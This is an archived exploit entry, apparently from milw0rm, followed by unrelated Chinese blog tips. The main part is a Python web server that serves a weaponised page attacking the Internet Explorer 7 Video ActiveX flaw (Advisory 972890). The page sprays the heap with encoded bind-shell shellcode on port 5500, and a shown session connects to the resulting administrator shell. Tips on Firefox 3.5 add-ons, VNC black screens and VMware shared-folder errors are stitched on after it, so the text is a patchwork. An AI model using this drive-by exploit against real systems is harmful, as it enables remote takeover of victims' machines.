milw0rm.com [2009-07-10]
#!/usr/bin/env python
###############################################################################
# MS Internet Explorer 7 Video ActiveX Exploit (Advisory 972890) #
###############################################################################
# #
# Tested on Windows 2003 SP2 R2, XPSP3 IE7 #
# #
# Written by SecureState R&D Team #
# Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin #
# http://www.securestate.com #
# #
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind #
# #
###############################################################################
#
#
# It's somewhat unreliable, can crash IE at times, found it to be around a 60%
# hit.
#
# This exploit is publicly being exploited in the wild, opted to release this
# to the research community. Microsoft is aware of the vulnerability.
#
###############################################################################
#
#
# [-] Exploit sent... [-]
# [-] Wait about 30 seconds and attempt to connect.[-]
# [-]telnet/nc to IP Address: 10.211.55.140 and port 5500 [-]
#
# relik@sslinuxvm1:~$ telnet 10.211.55.140 5500
# Trying 10.211.55.140...
# Connected to 10.211.55.140.
# Escape character is '^]'.
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\Documents and Settings\Administrator\Desktop>
from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
import sys,binascii
try:
import psyco
psyco.full()
except ImportError:
pass
class myRequestHandler(BaseHTTPRequestHandler):
try:
def do_GET(self):
# Always Accept GET
self.printCustomHTTPResponse(200)
# Site root: Main Menu
if self.path == "/ohn0es.jpg":
unhex=binascii.unhexlify("000300001120340000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0c0c0c0c00")
self.wfile.write(unhex)
if self.path == "/":
target=self.client_address[0]
self.wfile.write("""<html><head>""")
self.wfile.write("""
// Javascript code taken from multiple exploits and exploits that are being actively exploited in the wild
<script language="JavaScript" defer>
function Check() {
// win32_bind - EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai http://metasploit.com */
var shellcode = unescape("%ud9db%u74d9%uf424%uc929%u51b1%u02bf%u6c21%u588e%u7831%u8317%u04c0%u7a03%u8e32%u867b%ua55e%u9ec9%uc666%ua12d%ub2f9%u79be%u4fde%ubd7b%u2c95%uc581%u23a8%u7a02%u30b3%ua44a%uadc2%u2f3c%ubaf0%uc1be%u7cc8%ub159%ubdaf%uce2e%uf76e%ud1c2%ue3b2%uea29%ud066%u79f9%u9362%ua5a5%u4f6d%u2e3f%uc461%u6f4b%udb66%u8ca0%u50ba%ufebf%u7ae6%u3da1%u59d7%u4a45%u6e5b%u0c0d%u0550%u9061%u92c5%ua0c2%ucd4b%ufe4c%ue17d%u0101%u9f57%u9bf2%u5330%u0bc7%ue0b6%u9415%uf86c%u428a%ueb46%ua9d7%u0b08%u92f1%u1621%uad98%ud1df%uf867%ue075%ud298%u3de2%u276f%uea5f%u118f%u46f3%uce23%u2ba7%ub390%u5314%u55c6%ubef3%uff9b%u4850%u6a82%uee3e%ue45f%ub978%ud2a0%u56ed%u8f0e%u860e%u8bd8%u095c%u84f0%u8061%u7f51%ufd61%u9a3e%u78d4%u33f7%u5218%uef58%u0eb2%udfa6%ud9a8%ua6bf%u6008%ua717%uc643%u8768%u830a%u41f2%u30bb%u0496%uddde%u4f38%uee08%u8830%uaa20%ub4cb%uf284%u923f%ub019%u1c92%u19a7%u6d7e%u5a52%uc62b%uf208%ue659%u15fc%u6361%ue547%ud04b%u4b10%ub725%u01cf%u66c4%u80a1%u7797%u4391%u5eb5%u5a17%u9f96%u08ce%ua0e6%u33d8%ud5c8%u3070%u2d6a%u371a%uffbb%u171c%u0f2c%u9c68%ubcf2%u4b92%u92f3");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize + shellcode.length;
while (bigblock.length < slackspace) bigblock += bigblock;
var fillblock = bigblock.substring(0,slackspace);
var block = bigblock.substring(0,bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
var memory = new Array();
for (i = 0; i < 350; i++){ memory[i] = block + shellcode}
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./ohn0es.jpg';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
}
</script>
</head>
<body onload="Check();">
<div id="DivID"> """)
self.wfile.write("""<title>MS Internet Explorer 7 Video ActiveX Exploit (Advisory 972890)</title></head><body>""")
self.wfile.write("""<left><body bgcolor="Black"><font color="White"><p>Exploit is running...</p><br>""")
print ("\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-]telnet/nc to IP Address: %s and port 5500 [-]" % (target))
# Print custom HTTP Response
def printCustomHTTPResponse(self, respcode):
self.send_response(respcode)
self.send_header("Content-type", "text/html")
self.send_header("Server", "myRequestHandler")
self.end_headers()
# In case of exceptions, pass them
except Exception:
pass
httpd = HTTPServer(('', 80), myRequestHandler)
print ("""
###################################################################################
# MS Internet Explorer 7 Video ActiveX Exploit (Advisory 972890) #
###################################################################################
# #
# Tested on Windows 2003 SP2 R2, WinXPSP3 #
# #
# Written by SecureState R&D Team #
# http://www.securestate.com #
# Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin #
# #
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind #
# #
# It's somewhat unreliable, can crash IE at times, found it to be around a 60% #
# hit. #
# #
# This exploit is publicly being exploited in the wild, opted to release this #
# to the research community. Microsoft is aware of the vulnerability #
# (Advisory 972890). #
# #
###################################################################################
""")
print ("[-] Starting MS Internet Explorer 7 Video ActiveX Exploit:80 [-]")
print ("[-] Have someone connect to you on port 80 [-]")
print ("Type <control>-c to exit..")
try:
# handle the connections
httpd.handle_request()
# Serve HTTP server forever
httpd.serve_forever()
# Except Keyboard Interrupts and throw custom message
except KeyboardInterrupt:
print ("\n\nExiting exploit...\n\n")
sys.exit()
Firefox出了3.5版本了,升级到3.5,完后firefox却不认迅雷了,而且还将迅雷下载的组件给禁用了,真shit!
在网上搜了一些方法,都不太适合自己。
后来通过Google,找到一位网友所提供的方法,经过测试发现很好用。
特共享出来给需要的朋友。
安装方法:
解压压缩包后,
1、执行文件夹里面的Greasemonkey{0.8.20090123.1}.xpi,进行安装,安装完后重启FireFox;
2、执行文件夹里面的ThunderExtension{3.5}.xpi,进行安装,完装完后重启FireFox;
3、打开FireFox的窗口,并将xunlei_href_remover.user.js拖到FireFox窗口中,等3秒钟,点击“安装”按钮。
OK,搞定!现在可以看看 FireFox里的附加组件,发现迅雷的组件在里面了吧,而且还是启用状态。:)
说实话,不是很喜欢FireFox3.5这个版本,3.5版本的标签页在同一时间内,最少得保留一个,这就意味着要想将已打开的标签页全部关闭,必须得新建一个标签页,才可以将之前的都关闭,除非将FireFox的主窗口整个都关闭,有点像IE7的窗口。:(
下载文件 (已下载 180 次)在Linux里安装配置完VNC服务端,发现多用户登陆会出现黑屏的情况,具体的现象为:
客户端可以通过IP与会话号登陆进入系统,但登陆进去是漆黑一片,除了一个叉形的鼠标以外,伸手不见五指。
原因:用户的VNC的启动文件权限未设置正确。
解决方法:将黑屏用户的xstartup(一般为:/home/用户名称/.vnc/xstartup)文件的属性修改为755(rwxr-xr-x)。
完后杀掉所有已经启动的VNC客户端:
最后重启vncserver服务即可!
在VM里给CentOS安装VMTools后重启,在系统启动过程中出现三处提示,分别为:
第一处:Mounting local filesystem: Error: Cannot mount filesystem: Protocol error [FAILED]
第二处:Starting vmware-tools: Starting VMware Tools services in the virtual machine:
Switching to guest configuration:
Guest filesystem driver:
Mounting HGFS share:VMware hgfs: HGFS is disabled in the host [FAILED]
第三处:Mounting other filesystem: VMware hgfs: HGFS is disabled in the host Error: cannot mount filesystem: Protocol error [FAILED]
解决方法:
关闭VM上的系统,右键点击虚拟机,打开”虚拟机设置“,切换到”选项“标签,点击”共享文件夹“,默认是禁用状态,鼠标选中此项,在右边的”文件夹共享“中,选择”总是启用“,最后点击”确定“即可。
再启动VM里的系统,刚才的错误提示没有了。
